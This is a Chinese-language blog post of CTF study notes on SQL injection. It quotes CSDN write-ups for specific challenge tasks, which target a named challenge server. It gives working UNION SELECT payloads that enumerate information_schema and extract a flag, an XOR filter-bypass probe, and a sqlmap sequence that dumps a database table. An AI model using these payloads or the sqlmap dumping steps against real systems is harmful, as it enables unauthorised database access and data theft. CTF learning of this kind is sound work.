• [web]sql


    索引: 

    [成绩单] [login1][多次]

    其他150+的web题目

    =============================

    首先,我们通过[多次]这个题目来学习一下

    url藏着id 那么id=1 根据提示也猜存在sql注入

    SQL里没有双引号用法,数据类型为字符时用单引号

    ---------不知道为什么  先记住吧。。

    id=1后面加单引号会报错,后面加--+注释返回正常,确定存在SQL注入

    【id=1‘ 是不行的  id=1=1--+是可以的(不知道为什么)】

    然后试了一下  or这俩是错误 ,但oorr可以(存在过滤,可以进行双写)

    那么我们用【异或注入来处理一下】

    http://120.24.86.145:9004/1ndex.php?id=1'^(length('union')!=0)--+

    忽然灵光一现。。。 所以说要多走走多活动活动啊,,,,

    sql是恶意注入,分为:  

    用了’,导致后面的语法变成了一串字符串(多神奇啊 ) 全都错了...

    用了#之后,用了-- +之后.....

    来源:

    https://blog.csdn.net/johnlxj/article/details/82153355?utm_source=blogxgwz3

    方法一:常规方法

    进入这道题目 我们先手遍历一遍 id=-1' union select 1,2,3,4#

    发现有四个表且都有回显

    于是 就开始爆破吧

    通过id=-1' union select 1,2,3,database()#得到数据库名字skctf_flag

    之后通过 id=-1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema=database()# 得到表名fl4g,sc

    很显然我们需要的数据在fl4g这个表里

    接下来我们就要暴字段了

    通过id=-1' union select 1,2,3,group_concat(column_name) from information_schema.columns where table_name=0x666c3467#

    得到字段skctf_flag

    最后我们就可以开始查询数据了

    通过id=-1' union select 1,2,3,skctf_flag from fl4g#

    得到BUGKU{Sql_INJECT0N_4813drd8hz4}
    --------------------- 

    原文:https://blog.csdn.net/johnlxj/article/details/82153355 

    还有就是

    然后打开sqlmap开始爆库:sqlmap.py -r “C:333.txt” -p id --current-db 
    -r –> 加载一个文件 
    -p –>指定参数 
    –current-db –>获取当前数据库名称(current前有两个-) 


    可以看到它的数据库为 ‘skctf_flag’,接着就是爆表 
    sqlmap.py -r “C:333.txt” -p id -D skctf_flag --tables 
    -D –>指定数据库名称 
    –tables –>列出数据库中的表(tables前有两个-) 


    可以看到当前数据库中有两个表,很明显,flag应该在fl4g表中,下面就是该爆出表中的字段了 
    sqlmap.py -r “C:333.txt” -p id -D skctf_flag -T fl4g --columns 
    -T –>指定表名称 
    –columns –>列出表中的字段 


    fl4g表中有一个名为skctf_flag字段,最后列出字段信息就可以啦。 
    sqlmap.py -r “c:333.txt” -p id -D skctf_flag -T fl4g -C skctf_flag --dump 
    –dump –>列出字段数据(dump前有两个-) 

    --------------------- 
    作者:Tle_Camouflage 
    来源:CSDN 
    原文:https://blog.csdn.net/Tle_Camouflage/article/details/81978305 
    版权声明:本文为博主原创文章,转载请附上博文链接!

    ==================

    ?id=1' union select 1,2,3,4 #

    成绩单的题目直接使用这个注入,发现可以回显

    然后下面的语句是用来搞出来系统里面备份的文件的....

    以及....  ?id=1' union select 1,2,3,group_concat(table_name) from information_schema.tables where table_schema='skctf_flag'#

     from information_schema.tables where table_schema='skctf_flag'#

  • 相关阅读:
    MFC 参考资料(转)
    .net core 下运行 supersocket
    C# 发送 get 请求
    aardio写的16进制解析库
    Tomcat部署springboot项目
    debian10 arm64架构下安装mysql或者mariadb
    javascript进行hex、base64、bytes[]、string的互转
    css蒙层
    js识别手机型号做业务判断
    transform方法适配页面大小
  • 原文地址:https://www.cnblogs.com/lx2331/p/9822585.html
Copyright © 2020-2023  润新知